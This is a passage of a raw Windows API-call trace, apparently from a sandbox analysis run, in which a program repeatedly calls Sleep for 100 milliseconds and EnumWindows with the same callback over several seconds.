[0286.531] Sleep (dwMilliseconds=0x64) [0286.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.550] Sleep (dwMilliseconds=0x64) [0286.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.571] Sleep (dwMilliseconds=0x64) [0286.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.606] Sleep (dwMilliseconds=0x64) [0286.631] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.631] Sleep (dwMilliseconds=0x64) [0286.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.644] Sleep (dwMilliseconds=0x64) [0286.687] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.687] Sleep (dwMilliseconds=0x64) [0286.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.720] Sleep (dwMilliseconds=0x64) [0286.724] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.724] Sleep (dwMilliseconds=0x64) [0286.759] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.760] Sleep (dwMilliseconds=0x64) [0286.796] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.796] Sleep (dwMilliseconds=0x64) [0286.801] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.801] Sleep (dwMilliseconds=0x64) [0286.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.867] Sleep (dwMilliseconds=0x64) [0286.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.904] Sleep (dwMilliseconds=0x64) [0286.993] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0286.994] Sleep (dwMilliseconds=0x64) [0287.043] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.044] Sleep (dwMilliseconds=0x64) [0287.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.065] Sleep (dwMilliseconds=0x64) [0287.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.083] Sleep (dwMilliseconds=0x64) [0287.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.125] Sleep (dwMilliseconds=0x64) [0287.153] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.153] Sleep (dwMilliseconds=0x64) [0287.161] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.162] Sleep (dwMilliseconds=0x64) [0287.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.207] Sleep (dwMilliseconds=0x64) [0287.243] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.243] Sleep (dwMilliseconds=0x64) [0287.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.247] Sleep (dwMilliseconds=0x64) [0287.288] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.288] Sleep (dwMilliseconds=0x64) [0287.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.325] Sleep (dwMilliseconds=0x64) [0287.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.341] Sleep (dwMilliseconds=0x64) [0287.368] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.369] Sleep (dwMilliseconds=0x64) [0287.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.411] Sleep (dwMilliseconds=0x64) [0287.436] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.440] Sleep (dwMilliseconds=0x64) [0287.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.451] Sleep (dwMilliseconds=0x64) [0287.487] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.488] Sleep (dwMilliseconds=0x64) [0287.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.524] Sleep (dwMilliseconds=0x64) [0287.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.526] Sleep (dwMilliseconds=0x64) [0287.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.562] Sleep (dwMilliseconds=0x64) [0287.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.599] Sleep (dwMilliseconds=0x64) [0287.607] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.608] Sleep (dwMilliseconds=0x64) [0287.637] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.637] Sleep (dwMilliseconds=0x64) [0287.673] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.674] Sleep (dwMilliseconds=0x64) [0287.691] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.691] Sleep (dwMilliseconds=0x64) [0287.696] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.696] Sleep (dwMilliseconds=0x64) [0287.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.716] Sleep (dwMilliseconds=0x64) [0287.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.751] Sleep (dwMilliseconds=0x64) [0287.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.778] Sleep (dwMilliseconds=0x64) [0287.792] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.793] Sleep (dwMilliseconds=0x64) [0287.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.843] Sleep (dwMilliseconds=0x64) [0287.881] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.882] Sleep (dwMilliseconds=0x64) [0287.889] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.889] Sleep (dwMilliseconds=0x64) [0287.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.929] Sleep (dwMilliseconds=0x64) [0287.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.973] Sleep (dwMilliseconds=0x64) [0287.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0287.976] Sleep (dwMilliseconds=0x64) [0288.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.012] Sleep (dwMilliseconds=0x64) [0288.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.050] Sleep (dwMilliseconds=0x64) [0288.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.058] Sleep (dwMilliseconds=0x64) [0288.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.087] Sleep (dwMilliseconds=0x64) [0288.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.214] Sleep (dwMilliseconds=0x64) [0288.243] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.243] Sleep (dwMilliseconds=0x64) [0288.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.263] Sleep (dwMilliseconds=0x64) [0288.299] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.299] Sleep (dwMilliseconds=0x64) [0288.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.328] Sleep (dwMilliseconds=0x64) [0288.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.331] Sleep (dwMilliseconds=0x64) [0288.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.340] Sleep (dwMilliseconds=0x64) [0288.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.375] Sleep (dwMilliseconds=0x64) [0288.411] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.411] Sleep (dwMilliseconds=0x64) [0288.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.448] Sleep (dwMilliseconds=0x64) [0288.486] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.487] Sleep (dwMilliseconds=0x64) [0288.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.495] Sleep (dwMilliseconds=0x64) [0288.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.523] Sleep (dwMilliseconds=0x64) [0288.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.563] Sleep (dwMilliseconds=0x64) [0288.580] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.580] Sleep (dwMilliseconds=0x64) [0288.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.604] Sleep (dwMilliseconds=0x64) [0288.639] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.639] Sleep (dwMilliseconds=0x64) [0288.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.665] Sleep (dwMilliseconds=0x64) [0288.677] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.677] Sleep (dwMilliseconds=0x64) [0288.713] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.713] Sleep (dwMilliseconds=0x64) [0288.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.746] Sleep (dwMilliseconds=0x64) [0288.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.750] Sleep (dwMilliseconds=0x64) [0288.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.786] Sleep (dwMilliseconds=0x64) [0288.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.844] Sleep (dwMilliseconds=0x64) [0288.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.850] Sleep (dwMilliseconds=0x64) [0288.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.894] Sleep (dwMilliseconds=0x64) [0288.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.931] Sleep (dwMilliseconds=0x64) [0288.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.945] Sleep (dwMilliseconds=0x64) [0288.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0288.969] Sleep (dwMilliseconds=0x64) [0289.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.014] Sleep (dwMilliseconds=0x64) [0289.038] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.039] Sleep (dwMilliseconds=0x64) [0289.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.056] Sleep (dwMilliseconds=0x64) [0289.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.091] Sleep (dwMilliseconds=0x64) [0289.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.122] Sleep (dwMilliseconds=0x64) [0289.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.129] Sleep (dwMilliseconds=0x64) [0289.164] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.164] Sleep (dwMilliseconds=0x64) [0289.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.213] Sleep (dwMilliseconds=0x64) [0289.215] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.215] Sleep (dwMilliseconds=0x64) [0289.279] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.279] Sleep (dwMilliseconds=0x64) [0289.427] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.428] Sleep (dwMilliseconds=0x64) [0289.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.443] Sleep (dwMilliseconds=0x64) [0289.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.479] Sleep (dwMilliseconds=0x64) [0289.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.520] Sleep (dwMilliseconds=0x64) [0289.543] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.543] Sleep (dwMilliseconds=0x64) [0289.558] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.559] Sleep (dwMilliseconds=0x64) [0289.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.594] Sleep (dwMilliseconds=0x64) [0289.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.622] Sleep (dwMilliseconds=0x64) [0289.634] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.634] Sleep (dwMilliseconds=0x64) [0289.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.671] Sleep (dwMilliseconds=0x64) [0289.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.706] Sleep (dwMilliseconds=0x64) [0289.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.708] Sleep (dwMilliseconds=0x64) [0289.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.743] Sleep (dwMilliseconds=0x64) [0289.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.783] Sleep (dwMilliseconds=0x64) [0289.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.791] Sleep (dwMilliseconds=0x64) [0289.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.869] Sleep (dwMilliseconds=0x64) [0289.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.907] Sleep (dwMilliseconds=0x64) [0289.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.939] Sleep (dwMilliseconds=0x64) [0289.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.960] Sleep (dwMilliseconds=0x64) [0289.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0289.997] Sleep (dwMilliseconds=0x64) [0290.023] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.023] Sleep (dwMilliseconds=0x64) [0290.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.034] Sleep (dwMilliseconds=0x64) [0290.071] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.071] Sleep (dwMilliseconds=0x64) [0290.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.112] Sleep (dwMilliseconds=0x64) [0290.136] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.136] Sleep (dwMilliseconds=0x64) [0290.178] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.179] Sleep (dwMilliseconds=0x64) [0290.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.214] Sleep (dwMilliseconds=0x64) [0290.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.237] Sleep (dwMilliseconds=0x64) [0290.273] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.274] Sleep (dwMilliseconds=0x64) [0290.311] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.312] Sleep (dwMilliseconds=0x64) [0290.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.328] Sleep (dwMilliseconds=0x64) [0290.351] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.351] Sleep (dwMilliseconds=0x64) [0290.386] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.386] Sleep (dwMilliseconds=0x64) [0290.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.407] Sleep (dwMilliseconds=0x64) [0290.423] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.424] Sleep (dwMilliseconds=0x64) [0290.459] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.460] Sleep (dwMilliseconds=0x64) [0290.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.494] Sleep (dwMilliseconds=0x64) [0290.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.526] Sleep (dwMilliseconds=0x64) [0290.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.562] Sleep (dwMilliseconds=0x64) [0290.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.597] Sleep (dwMilliseconds=0x64) [0290.603] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.604] Sleep (dwMilliseconds=0x64) [0290.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.634] Sleep (dwMilliseconds=0x64) [0290.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.670] Sleep (dwMilliseconds=0x64) [0290.685] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.686] Sleep (dwMilliseconds=0x64) [0290.708] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.709] Sleep (dwMilliseconds=0x64) [0290.747] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.748] Sleep (dwMilliseconds=0x64) [0290.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.770] Sleep (dwMilliseconds=0x64) [0290.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.785] Sleep (dwMilliseconds=0x64) [0290.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.840] Sleep (dwMilliseconds=0x64) [0290.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.895] Sleep (dwMilliseconds=0x64) [0290.912] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.912] Sleep (dwMilliseconds=0x64) [0290.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.952] Sleep (dwMilliseconds=0x64) [0290.987] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0290.988] Sleep (dwMilliseconds=0x64) [0291.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.001] Sleep (dwMilliseconds=0x64) [0291.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.027] Sleep (dwMilliseconds=0x64) [0291.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.063] Sleep (dwMilliseconds=0x64) [0291.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.083] Sleep (dwMilliseconds=0x64) [0291.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.101] Sleep (dwMilliseconds=0x64) [0291.136] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.137] Sleep (dwMilliseconds=0x64) [0291.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.165] Sleep (dwMilliseconds=0x64) [0291.173] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.173] Sleep (dwMilliseconds=0x64) [0291.211] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.211] Sleep (dwMilliseconds=0x64) [0291.245] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.246] Sleep (dwMilliseconds=0x64) [0291.258] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.259] Sleep (dwMilliseconds=0x64) [0291.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.296] Sleep (dwMilliseconds=0x64) [0291.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.332] Sleep (dwMilliseconds=0x64) [0291.339] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.339] Sleep (dwMilliseconds=0x64) [0291.371] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.371] Sleep (dwMilliseconds=0x64) [0291.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.411] Sleep (dwMilliseconds=0x64) [0291.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.425] Sleep (dwMilliseconds=0x64) [0291.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.450] Sleep (dwMilliseconds=0x64) [0291.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.485] Sleep (dwMilliseconds=0x64) [0291.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.511] Sleep (dwMilliseconds=0x64) [0291.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.526] Sleep (dwMilliseconds=0x64) [0291.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.562] Sleep (dwMilliseconds=0x64) [0291.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.593] Sleep (dwMilliseconds=0x64) [0291.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.601] Sleep (dwMilliseconds=0x64) [0291.636] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.636] Sleep (dwMilliseconds=0x64) [0291.680] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.680] Sleep (dwMilliseconds=0x64) [0291.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.720] Sleep (dwMilliseconds=0x64) [0291.754] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.755] Sleep (dwMilliseconds=0x64) [0291.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.791] Sleep (dwMilliseconds=0x64) [0291.805] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.805] Sleep (dwMilliseconds=0x64) [0291.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.852] Sleep (dwMilliseconds=0x64) [0291.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.899] Sleep (dwMilliseconds=0x64) [0291.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.929] Sleep (dwMilliseconds=0x64) [0291.940] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.941] Sleep (dwMilliseconds=0x64) [0291.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0291.977] Sleep (dwMilliseconds=0x64) [0292.019] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.019] Sleep (dwMilliseconds=0x64) [0292.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.058] Sleep (dwMilliseconds=0x64) [0292.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.095] Sleep (dwMilliseconds=0x64) [0292.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.103] Sleep (dwMilliseconds=0x64) [0292.137] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.137] Sleep (dwMilliseconds=0x64) [0292.178] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.179] Sleep (dwMilliseconds=0x64) [0292.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.196] Sleep (dwMilliseconds=0x64) [0292.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.222] Sleep (dwMilliseconds=0x64) [0292.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.298] Sleep (dwMilliseconds=0x64) [0292.306] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.306] Sleep (dwMilliseconds=0x64) [0292.346] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.347] Sleep (dwMilliseconds=0x64) [0292.384] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.384] Sleep (dwMilliseconds=0x64) [0292.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.390] Sleep (dwMilliseconds=0x64) [0292.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.423] Sleep (dwMilliseconds=0x64) [0292.462] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.463] Sleep (dwMilliseconds=0x64) [0292.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.478] Sleep (dwMilliseconds=0x64) [0292.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.507] Sleep (dwMilliseconds=0x64) [0292.544] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.545] Sleep (dwMilliseconds=0x64) [0292.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.579] Sleep (dwMilliseconds=0x64) [0292.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.586] Sleep (dwMilliseconds=0x64) [0292.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.627] Sleep (dwMilliseconds=0x64) [0292.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.664] Sleep (dwMilliseconds=0x64) [0292.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.672] Sleep (dwMilliseconds=0x64) [0292.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.701] Sleep (dwMilliseconds=0x64) [0292.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.741] Sleep (dwMilliseconds=0x64) [0292.761] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.762] Sleep (dwMilliseconds=0x64) [0292.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.796] Sleep (dwMilliseconds=0x64) [0292.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.916] Sleep (dwMilliseconds=0x64) [0292.958] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.959] Sleep (dwMilliseconds=0x64) [0292.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.963] Sleep (dwMilliseconds=0x64) [0292.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0292.997] Sleep (dwMilliseconds=0x64) [0293.046] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.046] Sleep (dwMilliseconds=0x64) [0293.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.069] Sleep (dwMilliseconds=0x64) [0293.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.091] Sleep (dwMilliseconds=0x64) [0293.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.132] Sleep (dwMilliseconds=0x64) [0293.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.165] Sleep (dwMilliseconds=0x64) [0293.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.174] Sleep (dwMilliseconds=0x64) [0293.209] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.245] Sleep (dwMilliseconds=0x64) [0293.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.247] Sleep (dwMilliseconds=0x64) [0293.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.282] Sleep (dwMilliseconds=0x64) [0293.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.328] Sleep (dwMilliseconds=0x64) [0293.339] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.340] Sleep (dwMilliseconds=0x64) [0293.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.366] Sleep (dwMilliseconds=0x64) [0293.402] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.403] Sleep (dwMilliseconds=0x64) [0293.424] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.425] Sleep (dwMilliseconds=0x64) [0293.442] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.442] Sleep (dwMilliseconds=0x64) [0293.477] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.478] Sleep (dwMilliseconds=0x64) [0293.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.512] Sleep (dwMilliseconds=0x64) [0293.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.518] Sleep (dwMilliseconds=0x64) [0293.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.554] Sleep (dwMilliseconds=0x64) [0293.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.593] Sleep (dwMilliseconds=0x64) [0293.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.598] Sleep (dwMilliseconds=0x64) [0293.630] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.630] Sleep (dwMilliseconds=0x64) [0293.673] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.674] Sleep (dwMilliseconds=0x64) [0293.689] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.689] Sleep (dwMilliseconds=0x64) [0293.712] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.713] Sleep (dwMilliseconds=0x64) [0293.749] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) 